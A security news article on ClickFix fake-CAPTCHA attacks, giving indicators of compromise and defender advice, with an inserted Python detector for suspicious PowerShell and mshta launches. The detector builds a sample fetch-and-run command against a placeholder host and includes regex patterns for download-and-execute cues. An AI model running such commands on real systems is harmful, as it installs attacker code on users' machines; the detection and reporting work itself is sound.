ClickFix, a browser-based delivery technique, has emerged as a growing threat in the cybersecurity landscape.
This method employs deceptive prompts and clipboard hijacking to trick users into executing malicious commands.
Often disguised as system alerts or CAPTCHA challenges, these web pages lure users into clicking buttons that silently stage payloads for execution.
Diverse Malware Deployment and Credential Theft
Cybercriminals and advanced actors have adopted ClickFix to deploy various types of malware, with information stealers being the most common.
These are typically delivered via mshta.exe, PowerShell, or embedded JavaScript.
Recent investigations have uncovered multiple live domains serving malicious content using this technique.
One example involves a Bitcoin-themed domain posing as a Cloudflare Web Application Firewall (WAF) to deliver Lumma and CryptBot malware.
The site, soubtcevent[.]com, presents a CAPTCHA-style verification page followed by a fake Cloudflare WAF check.
Upon user interaction, it executes a Base64-encoded PowerShell script that downloads malicious executables.
Another variant targets Zoho Office Suite credentials. The domain timestesol[.]com displays a “Webmail Sign-in” page with a robot verification prompt.
After interacting with the verification button, users are redirected to a fake Zoho login page.

The entered credentials are then sent to an actor-controlled endpoint via a hardcoded Telegram bot token.
Fileless Payload Delivery and Compromised Infrastructure
ClickFix has also been observed using compromised infrastructure to deliver fileless PowerShell payloads.
In one instance, a compromised website at riverview-pools[.]com copied a PowerShell command to the user’s clipboard upon clicking a verification prompt.

According to Hunt, this command attempted to retrieve and execute additional scripts from other potentially compromised websites.
To reduce exposure to ClickFix-style attacks, security experts recommend monitoring for clipboard-based execution involving PowerShell, mshta.exe, or Base64-encoded commands.
Defenders should also alert on or block access to domains hosting verification-style lures that mimic CAPTCHA challenges or security checks.
Deploying endpoint detection tools configured to log PowerShell activity, script-based execution, and unusual clipboard use is crucial.
Additionally, encouraging users to enroll in multi-factor authentication (MFA) can help mitigate the impact of potential credential harvesting campaigns[1].
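As an added illustration of the monitoring advice above (example code, not from the article or from Hunt), the following Python routine scores constructed process-creation records for the cues named here: a script host launched by explorer.exe, a Base64 -EncodedCommand (which it decodes), and a remote download or an mshta.exe URL. The event field names, the placeholder host and the explorer.exe-parent heuristic are assumptions.

```python
import base64
import re

# Constructed sample of a command a ClickFix lure might place on the clipboard (placeholder
# host, not an indicator from the article). -EncodedCommand takes Base64 of UTF-16LE text.
CLIPBOARD_COMMAND = "iwr http://example.invalid/a.ps1 | iex"
ENCODED = base64.b64encode(CLIPBOARD_COMMAND.encode("utf-16le")).decode()

# Constructed process-creation events, shaped like Sysmon Event ID 1 / EDR records.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify.hta"},
    {"parent": "svchost.exe", "image": "powershell.exe",        # benign scheduled task
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# -e / -ec / -en / -enc / -encodedcommand followed by a Base64 blob
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
REMOTE_RE = re.compile(r"\b(?:iwr|iex|invoke-webrequest|invoke-expression|downloadstring|downloadfile)\b|https?://", re.I)  # fetch-and-run cues

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Reasons an event looks like ClickFix-style execution; an empty list means not flagged."""
    reasons = []
    image = ev["image"].lower()
    if image not in SCRIPT_HOSTS:
        return reasons
    if ev["parent"].lower() == "explorer.exe":
        reasons.append("script host spawned by explorer.exe (user-pasted command, e.g. Run dialog)")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append(f"Base64 -EncodedCommand decodes to: {decoded}")
    if REMOTE_RE.search(decoded or ev["cmdline"]):   # inspect the decoded text when present
        reasons.append("remote download/execution cue in command line")
    if image == "mshta.exe" and re.search(r"https?://", ev["cmdline"], re.I):
        reasons.append("mshta.exe launched with a remote URL")
    return reasons
```

Running score_event over each record and alerting on any non-empty result flags the first two constructed events and leaves the scheduled-task event alone; decoding the Base64 first is what lets the download cue be seen at all.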
Indicators of Compromise (IoCs)
Several domains and IP addresses have been identified as part of the ClickFix infrastructure.
Notable examples include soubtcevent[.]com (94.181.229[.]250), informepartne[.]com (104.21.60[.]15), and securedmicrosoft365[.]com (20.217.17[.]201).
File-based IoCs include malicious executables such as verify1.exe (SHA-256: dad4ecd247efa876faac2e3f67130951b044043ca21c5db6281ba2b8fce7a089) and verify2.exe (SHA-256: 69c513f0ddf4416e0d47f778594fd76b96424359c7e9c2e5585ad0abaaf5dbc0)[1].
As ClickFix continues to evolve, organizations must remain vigilant and adapt their security measures to counter this deceptive and potentially devastating threat.